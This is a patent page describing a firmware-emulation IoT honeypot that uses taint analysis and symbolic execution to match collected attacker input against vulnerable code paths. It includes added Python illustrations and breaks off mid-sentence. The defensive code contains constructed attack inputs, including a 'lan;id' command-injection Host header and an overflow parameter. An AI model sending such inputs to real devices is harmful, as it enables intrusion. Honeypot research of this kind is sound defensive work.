CN116502226B - Firmware simulation-based high-interaction Internet of things honeypot deployment method and system - Google Patents


Info

Publication number: CN116502226B
Application number: CN202310763186.5A
Authority: CN (China)
Prior art keywords: firmware, input information, alarm, honeypot, binary
Legal status: Active
Other languages: Chinese (zh)
Other versions: CN116502226A (en)
Inventors: 许海涛, 李焕宇, 周志昊, 张帆, 赵新杰, 郭世泽
Current assignee: Zhejiang University (ZJU)
Original assignee: Zhejiang University (ZJU)
Application filed by Zhejiang University (ZJU)
Priority to CN202310763186.5A
Publication of CN116502226A
Application granted
Publication of CN116502226B
Legal status: Active (current)

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562 Static detection
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F9/00 Arrangements for program control, e.g. control units
    • G06F9/06 Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
    • G06F9/44 Arrangements for executing specific programs
    • G06F9/455 Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines
    • Y GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02 TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02D CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D30/00 Reducing energy consumption in communication networks
    • Y02D30/50 Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate

Abstract

The application discloses a high-interaction Internet of Things honeypot deployment method and system based on firmware simulation, comprising the following steps: acquiring firmware; performing image analysis on the firmware, and analysing the firmware image with static taint analysis and symbolic execution to obtain the alarm information of the firmware and the input information that triggers an alarm; building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers; and reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information that triggers the alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat intelligence. The method performs system-level emulation of Internet of Things devices and builds a high-interaction Internet of Things device honeypot that can collect and analyse external input information in real time and capture threat behaviour, which further improves the interaction capability and threat-trapping capability of the Internet of Things honeypot system.

Description

Firmware simulation-based high-interaction Internet of things honeypot deployment method and system
Technical Field
The application belongs to the technical field of computer network security, relates to Internet of Things device firmware emulation, static analysis and high-interaction Internet of Things honeypot techniques, and in particular relates to a high-interaction Internet of Things honeypot deployment method based on firmware simulation.
Background
The Internet of Things is an important component of the new generation of information technology and is widely applied in many areas of economic and social development, such as industrial control systems, smart homes and smart cities. With the explosive growth of Internet of Things applications, Internet of Things devices are directly exposed on the internet, which makes them a key target for attackers and has given rise to a large number of security incidents.
A honeypot is an information system that deliberately uses information resources to attract attackers into unauthorised or illegal access, so that network security researchers can discover, capture and analyse attack behaviour. A honeypot system consists of decoy resources and a monitoring module. Decoy resources are the devices, network services or information used to attract and mislead attackers and to provide a usable operating environment for the attack activity; the monitoring module records and analyses all attack activity in the honeypot and safeguards the security of the honeypot itself.
An Internet of Things honeypot is a network information system that uses Internet of Things computing, network, sensing and actuation resources as decoys to discover, capture and analyse Internet of Things security threats. Internet of Things honeypots are divided into low/medium-interaction and high-interaction honeypots according to the strength of their interaction capability. A low/medium-interaction honeypot only emulates the essential communication interfaces of the Internet of Things device. These network communication interfaces include SSH, HTTP, Telnet, USB, Bluetooth and other protocols, and are the basis on which an attacker performs network reconnaissance, target identification, exploitation and other attacks. By collecting and analysing network traffic, a low/medium-interaction honeypot can quickly capture threat information such as attacker IP addresses and request payloads. Because of its small size, low deployment difficulty, high operating efficiency and easy maintenance, the low/medium-interaction honeypot has become the data collection tool of security threat awareness platforms. A high-interaction honeypot comprehensively emulates the operating environment and services of the Internet of Things device. Such honeypots can usually interact with an attacker over a long period and at multiple layers, achieving a high-fidelity imitation of a real Internet of Things device system. The high-interaction honeypot gives the attacker full access to the system, which yields more information and allows more detailed analysis.
Internet of Things firmware emulation, known as firmware re-hosting, is the process of migrating firmware from its original hardware environment to a virtualised hardware environment. System-wide emulators such as QEMU can be used to virtualise a firmware image as the decoy resource of a honeypot. An advantage of using firmware images is that many manufacturers of Internet of Things devices, such as routers, publish firmware images on their websites. Firmware emulation techniques can run such a firmware image, which makes it very easy to deploy honeypots for a wide range of firmware. Most Internet of Things device vendors use Linux-based firmware. Firmadyne is a firmware emulation framework that attempts a fully automated approach to re-hosting Linux-based firmware images, but it has a low emulation success rate because of the large number of firmware variants. The FirmAE framework improves the emulation success rate by adding boot sequences, repairing missing file system structures and applying other repair procedures; in addition, it improves network connectivity by retrieving an IP address from an external DHCP server.
Static analysis discovers vulnerabilities by analysing program features without executing the program code, and is the most commonly used automated analysis technique on general-purpose computing platforms. Because Internet of Things device programs are usually closed-source, the firmware is reverse-engineered: information such as program variables, functions, structures and control-flow graphs (CFGs) is recovered with reverse-engineering tools or binary analysis platforms, and vulnerability mining is then carried out by combining several traditional static program analysis techniques such as fuzzy hashing and taint analysis. Firmware static taint analysis is an important branch of firmware static analysis; its main purpose is to discover sensitive information and taint sources in the firmware and track their flow paths through the firmware.
Existing high-interaction Internet of Things honeypots are mainly based on real Internet of Things devices: the captured traffic is forwarded to the real device through a network proxy and traffic forwarding, and the response generated by the real device is returned. Honeypots based on real devices are expensive to maintain and operate and cannot be deployed in large numbers. At present, honeypots based on QEMU emulation cannot cope with highly adversarial attack-and-defence scenarios because of limitations of firmware emulation technology; for example, after entering the honeypot an attacker often judges whether it is a honeypot by checking whether the Linux version matches the real device.
Disclosure of Invention
In view of the shortcomings of the prior art, the application provides a high-interaction Internet of Things honeypot deployment method and system based on firmware simulation.
According to a first aspect of an embodiment of the present application, there is provided a high-interaction Internet of Things honeypot deployment method based on firmware simulation, the method including:
acquiring firmware;
performing image analysis on the firmware, and analysing the firmware image with static taint analysis and symbolic execution to obtain the alarm information of the firmware and the input information that triggers an alarm;
building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers;
and reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information that triggers the alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat intelligence.
Further, performing image analysis on the firmware, analysing the firmware image with static taint analysis and symbolic execution, and obtaining the alarm information of the firmware and the input information that triggers the alarm includes:
decompressing and decrypting the firmware image to obtain the corresponding file system;
analysing each binary file in the file system, searching for code related to network services contained in the binary file, simulating program execution with symbolic execution, determining all code paths the program may encounter at run time, and detecting the code execution paths related to network services;
constructing a binary dependency graph according to the communication patterns among the binary files;
according to the binary dependency graph, tracking the program data flow with static taint analysis, and obtaining the alarm information, the input information that triggers the alarm and the vulnerable execution path.
Further, searching for code related to network services contained in the binary file includes the following:
a binary file containing code related to network services is a boundary binary file, which is an entry point for vulnerability analysis.
Further, constructing a binary dependency graph according to the communication patterns among the binary files includes:
analysing each binary file in the firmware image and selecting the binary files that contain function calls;
guided by the network keywords in the parameter registers of those function calls, determining the function calls that contain code related to network services and can communicate between different binary files, and marking each such function call as a communication basic block;
connecting all the communication basic blocks to obtain the binary dependency graph.
Further, building a honeypot system on a cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers includes:
emulating the firmware image with a firmware emulation framework;
building the honeypot system on the cloud server and configuring the communicator; the communicator manages communication between the honeypot system and the cloud server, manages the list of processes running in the honeypot, and screens for malicious processes.
Further, reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information that triggers the alarm, verifying whether the input information of the cloud server triggers a vulnerability, and capturing threat intelligence includes:
for a code execution path related to network services, obtaining the path constraints on that code execution path according to the alarm information of the firmware, and reconstructing the symbolic expression of the program;
converting the input information of the cloud server into input variables, simulating the execution of the program with symbolic execution, determining which input variables are tainted, comparing the tainted input variables with the path constraints, and determining whether an exploitable vulnerability exists; threat intelligence is generated when an exploitable vulnerability exists.
According to a second aspect of an embodiment of the present application, there is provided a high-interaction Internet of Things honeypot deployment system based on firmware simulation, implementing the above method, the system comprising:
a firmware acquisition module for acquiring firmware;
an alarm information acquisition module for performing image analysis on the firmware, analysing the firmware image with static taint analysis and symbolic execution, and obtaining the alarm information of the firmware and the input information that triggers an alarm;
a cloud server input information acquisition module for building the honeypot system on the cloud servers, configuring a communicator for communication between the honeypot system and the cloud servers, and collecting the input information of all the cloud servers;
a cloud server input information verification module for reconstructing the input information of the cloud server according to the alarm information of the firmware and the input information that triggers the alarm, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat intelligence.
Further, the alarm information acquisition module includes:
a boundary binary file search sub-module for decompressing and decrypting the firmware image to obtain the corresponding file system; analysing each binary file in the file system, searching for code related to network services contained in the binary file, taking a binary file containing such code as a boundary binary file, simulating program execution with symbolic execution, determining all code paths the program may encounter at run time, and detecting the code paths related to network services;
a binary dependency graph construction sub-module for constructing a binary dependency graph according to the communication patterns among the binary files;
and a vulnerability search sub-module for tracking the program data flow with static taint analysis according to the binary dependency graph, and obtaining the alarm information, the input information that triggers an alarm and the vulnerable execution path.
According to a third aspect of embodiments of the present application, there is provided an electronic device comprising a memory and a processor, the memory being coupled to the processor; the processor executes program data to implement the high-interaction Internet of Things honeypot deployment method based on firmware simulation.
According to a fourth aspect of an embodiment of the present application, there is provided a computer-readable storage medium on which a computer program is stored which, when executed by a processor, implements the above high-interaction Internet of Things honeypot deployment method based on firmware simulation.
Compared with the prior art, the application has the following beneficial effects:
(1) The application analyses the firmware image with static taint analysis and symbolic execution, obtains the alarm information of the firmware and the input information that triggers the alarm, and can detect all taint propagation paths in the code, thereby providing an accurate security analysis result.
(2) Unlike traditional honeypots, the application uses a traffic-based analysis technique: on the basis of static taint analysis of the firmware, it performs reconstructed symbolic execution on the input information of the cloud server for vulnerability mining, and has a higher detection success rate.
(3) The application adopts firmware emulation technology and uses a mature firmware emulation framework to emulate the firmware; through the framework it can emulate a wide range of Internet of Things devices, supports architectures such as x86, ARM and MIPS, can analyse the firmware dynamically, and saves the time and effort of security personnel through the automated framework, making it simple and efficient.
(4) By deploying a high-interaction honeypot system, the application lets the attacker believe that a real Internet of Things device is being attacked, records the complete attack behaviour, and at the same time conceals itself from the attacker as far as possible, so that the system can monitor and capture the attacker's operations continuously.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the description of the embodiments will be briefly described below, it being obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings may be obtained according to these drawings without inventive effort to a person skilled in the art.
FIG. 1 is a flowchart of a high-interaction Internet of things honeypot deployment method based on firmware simulation, which is provided by an embodiment of the application;
FIG. 2 is a schematic diagram of firmware analysis according to an embodiment of the present application;
FIG. 3 is a schematic diagram of a deployment honeypot provided by an embodiment of the application;
FIG. 4 is a schematic diagram of a high-interaction Internet of things honeypot deployment system based on firmware simulation provided by an embodiment of the application;
FIG. 5 is a schematic diagram of an electronic device according to an embodiment of the present application.
Detailed Description
Embodiments of the application are disclosed in the drawings, and for purposes of explanation numerous practical details are set forth in the following description. However, it should be understood that these practical details are not to be taken as limiting the application; that is, in some embodiments of the application these practical details are not necessary.
As shown in FIG. 1, an embodiment of the present application provides a high-interaction Internet of Things honeypot deployment method based on firmware simulation, which includes:
Step S1: obtaining firmware.
It should be noted that the present application crawls the corresponding firmware from the device vendor's official website, or reads the storage medium of the device (such as a flash memory chip or hard disk) directly.
Step S2: performing image analysis on the firmware, and analysing the firmware image with static taint analysis and symbolic execution to obtain the alarm information of the firmware and the input information that triggers an alarm.
Specifically, as shown in FIG. 2, step S2 includes the following sub-steps:
Step S201: decompressing and decrypting the firmware image to obtain the corresponding file system.
In this example, the Binwalk tool is used to decompress and decrypt the firmware image and obtain the corresponding file system of the firmware.
Step S202: analysing each binary file in the file system, searching for code related to network services contained in the binary file, simulating program execution with symbolic execution, determining all code paths the program may encounter at run time, and detecting the code execution paths related to network services.
Further, a binary file containing code related to network services is a boundary binary file, which is an entry point for vulnerability analysis.
Step S203: constructing a binary dependency graph according to the communication patterns among the binary files.
Specifically, each binary file in the firmware image is analysed to determine which function calls it contains, and the binary files containing function calls are selected.
Then each function call is checked for code related to network services; a call that contains such code is marked as a basic block that may cause communication.
Next, guided by the network keywords in the parameter registers of the function calls, it is determined which function calls are actually related to network services and can communicate between different binary files; these are marked as communication basic blocks.
Finally, all the communication basic blocks are connected to build a binary dependency graph that links all the binary files, in order to detect the communication patterns among the binary files and, at the same time, better understand the interaction patterns among the different components of the firmware image.
Step S204: tracking the program data flow with static taint analysis according to the binary dependency graph constructed in step S203, determining which data can reach a communication basic block that may contain a vulnerability, and obtaining the alarm information, the input information that triggers an alarm and the vulnerable execution path. The alarm information comprises the vulnerability type and the vulnerability location.
A single binary file is analysed in depth to determine whether a known vulnerability exists in it, and the basic block where the vulnerability may exist is marked.
For multiple binary files, static taint analysis is used together with the binary dependency graph constructed in step S203 to track the program data flow and determine which data may reach the basic blocks where vulnerabilities exist; finally, the alarm information and the input information that triggers the alarm are stored.
Step S3: building a honeypot system on the cloud server, configuring a communicator for communication between the honeypot system and the cloud server, and collecting the input information of all cloud servers.
Specifically, as shown in FIG. 3, step S3 includes:
The firmware image is emulated with the FirmAE framework. The firmware image first goes through a pre-emulation phase in which system calls to the file system and the network are intercepted, various system logs are collected, and the system and network configuration is inferred; the pre-emulation information is then combined to achieve the final emulation.
A communicator is configured on the cloud server and is responsible for managing communication between the honeypot system and the cloud server; the communicator establishes a secure communication channel for transmitting data between the honeypot system and the cloud server. In particular, the communicator is also configured to retrieve the list of active honeypot processes, inspect the processes currently running, determine which processes are likely to be malicious, and screen out malicious processes.
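The process screening the communicator performs in step S3 can be reduced to comparing the honeypot's live process list with what the firmware ran during pre-emulation. The following is an added illustration of that check, not code from the patent or from FirmAE: the BusyBox-style `ps` output, the baseline executable set and the list of writable directories are all constructed for this example, and a real communicator would also carry parent-process and network-socket information that this output lacks.

```python
"""Screen the emulated honeypot's process list against a pre-emulation baseline.
Added illustration; ps output, baseline and directory list are constructed."""

# Directories a firmware normally never executes from (assumed list).
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/run")

# Executables observed while pre-emulating the firmware image (constructed).
BASELINE_EXECUTABLES = {"init", "/usr/sbin/httpd", "/usr/sbin/telnetd",
                        "/sbin/watchdog"}

# Constructed `ps` output as retrieved from inside the emulated firmware.
PS_OUTPUT = """\
  PID USER       VSZ STAT COMMAND
    1 root      1234 S    init
  212 root      3120 S    /usr/sbin/httpd -p 80
  230 root      2048 S    /usr/sbin/telnetd
  301 root      1800 S    /sbin/watchdog -t 30
  455 root      2600 S    /tmp/.mnt/update -d
"""


def parse_ps(output):
    """Parse BusyBox-style ps output into dicts with pid, user and command."""
    procs = []
    for line in output.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 4)              # COMMAND keeps its spaces
        if len(fields) < 5:
            continue
        pid, user, _vsz, _stat, command = fields
        procs.append({"pid": int(pid), "user": user, "command": command})
    return procs


def screen_processes(procs, baseline=BASELINE_EXECUTABLES):
    """Return the processes the communicator should report as suspicious,
    each with the reasons that triggered the report."""
    flagged = []
    for proc in procs:
        executable = proc["command"].split()[0]
        reasons = []
        if executable not in baseline:
            reasons.append("executable not in pre-emulation baseline")
        if executable.startswith(WRITABLE_DIRS):
            reasons.append("runs from a writable directory")
        if reasons:
            flagged.append({**proc, "executable": executable, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for entry in screen_processes(parse_ps(PS_OUTPUT)):
        print(entry["pid"], entry["executable"], "->", "; ".join(entry["reasons"]))
```

The baseline is the reason the pre-emulation phase matters to the honeypot operator: without a record of which executables the firmware legitimately starts, a process dropped into `/tmp` by an intruder is indistinguishable from a vendor helper with an unfamiliar name.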
Step S4: reconstructing the input information of the cloud server based on the alarm information and the input information that triggers the alarm obtained in step S2, verifying whether the input information of the cloud server triggers the vulnerability, and capturing threat intelligence.
Specifically, as shown in FIG. 3, step S4 includes:
Step S401: for the code execution path obtained in step S2, analysing the path constraints on that code execution path according to the alarm information and the input information that triggers the alarm obtained in step S2, and reconstructing the symbolic expression of the program.
Step S402: converting the input information of the cloud server into input variables, and simulating the program execution process with symbolic execution to determine which input variables are tainted. The tainted input variables are compared with the path constraints, and constraint solving is used to determine whether an exploitable vulnerability exists. If an exploitable vulnerability exists, threat intelligence is generated.
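Steps S401 and S402 together form a verification loop: each alarm from the firmware analysis carries the path constraints under which its vulnerable sink is reached, and each request the honeypot collects is turned into input variables and tested against those constraints. The following is an added illustration of that loop, not the patent's code. The alarms, their constraint language, the variable names (REQUEST_METHOD, SCRIPT_PATH, HTTP_HOST and the query parameters) and the collected requests are all constructed; because the collected input is concrete, the constraints are evaluated directly instead of being handed to an SMT solver.

```python
"""Verify honeypot-collected HTTP requests against alarm path constraints.
Added illustration; alarms, constraint language and requests are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed alarms as the firmware-analysis stage would emit them.
ALARMS = [
    {"vuln_type": "buffer overflow", "location": "cgi_main:strcpy",
     "input_source": "QUERY_STRING",
     "constraints": [("eq", "REQUEST_METHOD", "GET"),
                     ("eq", "SCRIPT_PATH", "/cgi-bin/login"),
                     ("len_gt", "user", 64)]},      # assumed 64-byte stack buffer
    {"vuln_type": "command injection", "location": "watchdog:system",
     "input_source": "HTTP_HOST",
     "constraints": [("regex", "HTTP_HOST", r"[;|`$&]")]},
]


def to_input_variables(raw_request):
    """Convert one collected request into (variables, set of tainted names).
    Everything derived from the request is attacker-controlled and therefore
    tainted; a value the firmware fixes itself is added untainted for contrast."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    url = urlsplit(target)
    variables = {"REQUEST_METHOD": method, "SCRIPT_PATH": url.path,
                 "QUERY_STRING": url.query}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            variables["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        variables[name] = values[0]
    tainted = set(variables)
    variables["SERVER_SOFTWARE"] = "httpd/1.0"     # constructed firmware constant
    return variables, tainted


def constraint_holds(constraint, variables, tainted):
    """Evaluate one path constraint; only tainted variables can satisfy it."""
    op, var, *arg = constraint
    if var not in variables or var not in tainted:
        return False
    value = variables[var]
    if op == "eq":
        return value == arg[0]
    if op == "len_gt":
        return len(value) > arg[0]
    if op == "regex":
        return re.search(arg[0], value) is not None
    raise ValueError(f"unknown constraint {op}")


def verify_collected_inputs(requests, alarms):
    """Return a threat-intelligence record for each request that satisfies
    every path constraint of some alarm."""
    hits = []
    for req in requests:
        variables, tainted = to_input_variables(req["raw"])
        for alarm in alarms:
            if all(constraint_holds(c, variables, tainted) for c in alarm["constraints"]):
                hits.append({"src_ip": req["src_ip"], "timestamp": req["ts"],
                             "vuln_type": alarm["vuln_type"],
                             "location": alarm["location"],
                             "input_source": alarm["input_source"],
                             "evidence": variables[alarm["input_source"]]})
    return hits


# Constructed requests forwarded by the communicator (documentation-range IPs).
COLLECTED_REQUESTS = [
    {"src_ip": "203.0.113.7", "ts": "2024-01-01T10:00:00Z",
     "raw": "GET /cgi-bin/login?user=admin&pass=admin HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"},
    {"src_ip": "203.0.113.7", "ts": "2024-01-01T10:00:05Z",
     "raw": "GET /cgi-bin/login?user=" + "A" * 80 + "&pass=x HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n"},
    {"src_ip": "198.51.100.23", "ts": "2024-01-01T11:30:00Z",
     "raw": "GET /status.html HTTP/1.1\r\nHost: lan;id\r\n\r\n"},
]

if __name__ == "__main__":
    for hit in verify_collected_inputs(COLLECTED_REQUESTS, ALARMS):
        print(hit["src_ip"], hit["vuln_type"], "at", hit["location"])
```

The taint check in `constraint_holds` is what separates this from plain signature matching: a constraint over `SERVER_SOFTWARE` can never be satisfied by a request, so an alarm whose path depends only on firmware-internal values produces no threat intelligence regardless of what the attacker sends.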
Example 1
Step S1: the firmware obtaining and analyzing method comprises the steps of obtaining firmware information on a device official network and analyzing binary data of the firmware, wherein the method comprises the following steps:
downloading a firmware compression packet on a official network provided by a device manufacturer by using a web crawler; for firmware which does not provide a downloaded web page, the firmware directly reads the storage medium (such as a flash memory chip, a hard disk, etc.) of the device through hardware, and creates a complete image file. Reading the storage medium of the device using a specific hardware device or software tool or reading the storage of the device using a burner or programmer through a JTAG or UART interface connected to the device; and integrating and classifying all the collected firmware information, classifying and summarizing according to the information such as the equipment brand, the equipment type, the equipment model and the like, and facilitating the unified management in the later period.
Step S2: and (3) firstly analyzing the firmware acquired in the step (S1) by using Binwalk, then analyzing by using Karonte framework, and analyzing by using static stain analysis and symbol execution technology to obtain alarm information and a file of an alarm related input source which can be analyzed by a honeypot. The method comprises the following steps:
firmware analysis: the firmware of the internet of things device mainly comprises four parts, namely a Header, a bootstrap (BootLoader), a Kernel Code (Kernel Code) and a Root file system (Root file system). Firmware parsing is based on feature recognition, and various forms of unpacking and processing are performed on the original binary firmware code. The format parsing mainly comprises: firmware header identification, bootloader type identification, operating system type identification, compression format identification, file system investigation analysis and instruction set type identification, and extracting files in firmware based on the identification of the types, reading internal configuration files and code functions, and extracting key information for reference. And analyzing the firmware by using a third-party firmware analysis tool Binwalk to acquire a firmware image.
And (3) firmware analysis: firmware analysis is based on the karote framework implementation. The frame is divided into three steps: searching a boundary binary file, constructing a binary dependency graph and finding loopholes. The framework can perform static stain analysis and symbolic execution on the firmware image, and detect loopholes in the binary program. The firmware analyzer takes the firmware image as input, analyzes the image and returns two outputs: a file containing vulnerability alerts and a file of alert-related input sources.
Further explanation of finding boundary binaries, building binary dependency graphs, and discovering vulnerabilities follows:
boundary binary file lookup: after the file system is extracted, the firmware is analyzed. The goal is to detect a smuggling vulnerability of a network interface intrusion. To this end, the firmware analyzer needs to discover which binary files in the firmware image have network services and mark these files as blobs for subsequent blobs analysis. These binary files are network oriented binary files that represent entry points for vulnerability analysis.
Constructing a binary dependency graph: the application can detect single binary and multiple binary vulnerabilities. Multiple binary vulnerabilities often use a communication paradigm to transfer information between binary files. For example, one binary file sets the STRING "query_string" as the environment variable, and the other binary file retrieves the environment variable for the STRING. The goal of the binary dependency graph module is to detect these communication patterns and construct a graph that links all binary files.
First, static analysis is performed on the target binary program: the structure of the binary (functions, code blocks, instructions and so on) is analyzed and the symbol information in the program is extracted. The symbol reference relationships in the binaries are then analyzed; calling relationships among functions, the use of library functions and references to global variables are identified, and the direct and indirect dependency relationships among the binaries are established. In addition, the control flow and data flow of the binaries are analyzed to determine the interactions between them, tracking the call paths, data transfer paths and variable dependencies between functions.
Finding vulnerabilities: after the binary dependency graph is constructed, analysis is performed to detect vulnerabilities in the binaries. This includes multi-binary vulnerability analysis and single-binary vulnerability analysis. Multi-binary analysis is usually applied first: vulnerabilities in the interaction between binaries are detected by static taint analysis across multiple binaries. If no vulnerability is detected, single-binary analysis is performed; through static analysis of a single binary, vulnerabilities such as buffer overflows, format string vulnerabilities and code injection can be detected and analyzed. However, single-binary analysis has a higher false-positive rate than multi-binary analysis.
After the vulnerabilities and the vulnerable execution paths are discovered, these alert messages need to be parsed further so that they can be used in the honeypot. In addition, the location at which input information is collected is determined from the vulnerable execution path, so that the required input can be collected in the honeypot. Source parsing converts the alert information of the firmware into input collection positions (input sources) for the honeypot.
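The three steps above (boundary binaries, the binary dependency graph built from the setenv/getenv communication paradigm, and cross-binary static taint analysis producing an alert together with its input source), as one added example written for this page. It is not Karonte's code: the analysis runs over a tiny call-level intermediate representation rather than real binaries, the three "binaries" are constructed toys, and the source, sink and out-parameter tables are assumptions chosen to mirror the httpd/CGI pattern the text describes.

```python
"""Boundary-binary discovery, binary dependency graph (BDG) and cross-binary
static taint analysis over a tiny call-level IR. Added example for this page,
not Karonte's code: the firmware below is a constructed toy (three 'binaries'
written as call statements) and the source/sink tables are assumptions."""
import re

NET_SOURCES = {"recv", "recvfrom", "read", "accept"}          # input from the network
SINKS = {"strcpy": [1], "sprintf": [2], "system": [0], "popen": [0]}  # tainted arg positions
OUT_PARAM = {"strcpy": 0, "sprintf": 0, "strcat": 0}           # arg that receives the result
CALL_RE = re.compile(r"^(?:(\w+)\s*=\s*)?(\w+)\((.*)\)$")


def parse(stmt):
    """'dst = fn(a, "b")' -> ('dst', 'fn', ['a', 'b']); 'fn(a)' -> (None, 'fn', ['a'])."""
    m = CALL_RE.match(stmt.strip())
    if not m:
        raise ValueError(f"unparsable statement: {stmt}")
    dst, fn, raw = m.groups()
    args = [a.strip().strip('"') for a in raw.split(",")] if raw.strip() else []
    return dst, fn, args


def find_boundary_binaries(firmware):
    """Binaries that read from the network are the entry points of the analysis."""
    return {name for name, code in firmware.items()
            if any(parse(s)[1] in NET_SOURCES for s in code)}


def build_dependency_graph(firmware):
    """Edges (writer, reader, key) for the setenv/getenv communication paradigm."""
    writers, readers = {}, {}
    for name, code in firmware.items():
        for s in code:
            _, fn, args = parse(s)
            if fn == "setenv":
                writers.setdefault(args[0], set()).add(name)
            elif fn == "getenv":
                readers.setdefault(args[0], set()).add(name)
    return {(w, r, key) for key, ws in writers.items()
            for w in ws for r in readers.get(key, ()) if r != w}


def taint_analysis(firmware):
    """Propagate taint from network sources, across BDG edges, into sinks.
    Returns (boundary binaries, edges, alerts); each alert names its input source."""
    boundary = find_boundary_binaries(firmware)
    edges = build_dependency_graph(firmware)
    env_taint = {}                      # env key -> input sources reaching it
    alerts = []
    changed = True
    while changed:                      # iterate until cross-binary taint is stable
        changed = False
        for name, code in firmware.items():
            inbound = {key for w, r, key in edges if r == name}
            var_taint = {}              # variable -> input sources (intra-binary)
            for lineno, stmt in enumerate(code, 1):
                dst, fn, args = parse(stmt)
                if fn in NET_SOURCES and name in boundary:
                    t = {f"{name}:{lineno}:{fn}"}           # a new input source
                elif fn == "getenv" and args[0] in inbound:
                    t = set(env_taint.get(args[0], ()))     # taint crossing a BDG edge
                else:
                    t = set().union(*(var_taint.get(a, set()) for a in args))
                if fn == "setenv" and len(args) > 1 and var_taint.get(args[1]):
                    known = env_taint.setdefault(args[0], set())
                    if not var_taint[args[1]] <= known:
                        known |= var_taint[args[1]]
                        changed = True
                for pos in SINKS.get(fn, ()):
                    if pos < len(args) and var_taint.get(args[pos]):
                        alert = {"binary": name, "line": lineno, "sink": fn,
                                 "sources": sorted(var_taint[args[pos]])}
                        if alert not in alerts:
                            alerts.append(alert)
                if fn in OUT_PARAM and t:
                    var_taint[args[OUT_PARAM[fn]]] = t
                if dst and t:
                    var_taint[dst] = t
    return boundary, edges, alerts


# Constructed toy firmware: httpd receives a request and hands the query
# string to a CGI binary through the environment; ntpclient reads a key that
# no network-facing binary writes, so it must not raise an alert.
FIRMWARE = {
    "httpd": ['req = recv(sock)',
              'qs = strdup(req)',
              'setenv("QUERY_STRING", qs)',
              'system(cgi_path)'],
    "cgibin": ['q = getenv("QUERY_STRING")',
               'strcpy(buf, q)',
               'sprintf(cmd, "ping %s", q)',
               'system(cmd)'],
    "ntpclient": ['cfg = getenv("NTP_SERVER")',
                  'system(cfg)'],
}

if __name__ == "__main__":
    boundary, edges, alerts = taint_analysis(FIRMWARE)
    print("boundary binaries:", sorted(boundary))
    print("BDG edges:", sorted(edges))
    for a in alerts:
        print(f"ALERT {a['binary']}:{a['line']} {a['sink']} <- {a['sources']}")
```

The two outputs of the firmware analyzer map directly onto the return value: the alerts are the vulnerability report, and the `sources` field of each alert (here the recv call in httpd) is the input source the honeypot later instruments. The ntpclient binary shows why the dependency graph matters: it also passes environment data to system(), but without a network-facing writer for its key there is no path from an attacker to the sink, so reporting it would be a false positive.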
Step S3: the firmware information acquired in step S1 is emulated through the FirmAE framework, a communicator is designed, and the honeypot system is built. The method comprises the following steps:
FirmAE is downloaded and installed; its check function is used to detect whether the firmware image can be emulated successfully and to infer the network configuration of the firmware image. Once emulation is confirmed to work, FirmAE runs the firmware image in debug mode, building the honeypot.
A communicator is configured for communication between the honeypot system and the cloud server. The honeypot opens a netcat session while the cloud server starts the communicator; the communicator connects to the netcat server on the honeypot, retrieves the list of active processes and starts a tcpdump session to capture all incoming network traffic.
The communicator then starts GDB (the GNU debugger) on the cloud server; this GDB instance connects to the GDB server on the honeypot and runs a debug script that controls how the inputs of the binaries are collected and manages the actual set of collected inputs.
FIG. 3 shows the operational flow of the honeypot and its interactions with the cloud server, including:
